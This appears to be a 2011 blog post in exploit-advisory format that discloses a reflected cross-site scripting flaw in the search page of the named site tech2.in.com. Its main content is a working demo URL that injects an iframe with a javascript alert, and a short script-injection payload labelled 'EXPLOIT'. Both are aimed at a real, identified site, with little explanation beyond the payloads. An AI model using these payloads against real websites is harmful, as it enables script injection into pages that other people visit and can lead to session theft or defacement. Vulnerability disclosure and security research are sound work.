Tech2.in.com cross site scripting vulnerability

Tech2.in.com top site(alexa ranked 234)  suffers XSS vulnerability reported by me
other links:http://packetstormsecurity.org/files/author/9003/

%+         $…….#……..4………|)……..0…………\/\/       %+
%+                                                                                                         %+
%++++++++++++++++++++++++++++++++++++++++

# Exploit Title: TECH2.IN.COM XSS vulnerability
#Vendor: tech2.in.com
# Date: 5th july,2011
# Author: r007k17 a.k.a Raghavendra Karthik D

#Google Dork:   Copyright © 2011, Tech2.com India
*****************************************************************************************************************************
BREIF DESCRIPTION
*****************************
Reflected XSS in  tech2.in.com****************************************************************************************************************************** 
 XSS Vulnerability
******************************************************************************************************************************
{DEMO} :  http://tech2.in.com/search?q=%22%3E%3CIFRAME%20SRC=%22javascript:alert%28%27XSSed_by_r007k17%27%29;%22%3E%3C/IFRAME%3E
  
EXPLOIT: “>
                or “><script>alert(/r007k17/)</script>
******************************************************************************************************************************
sp3c14l Thanks to s1d3^effects and my friends@!3.14–
******************************************************************************************************************************

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: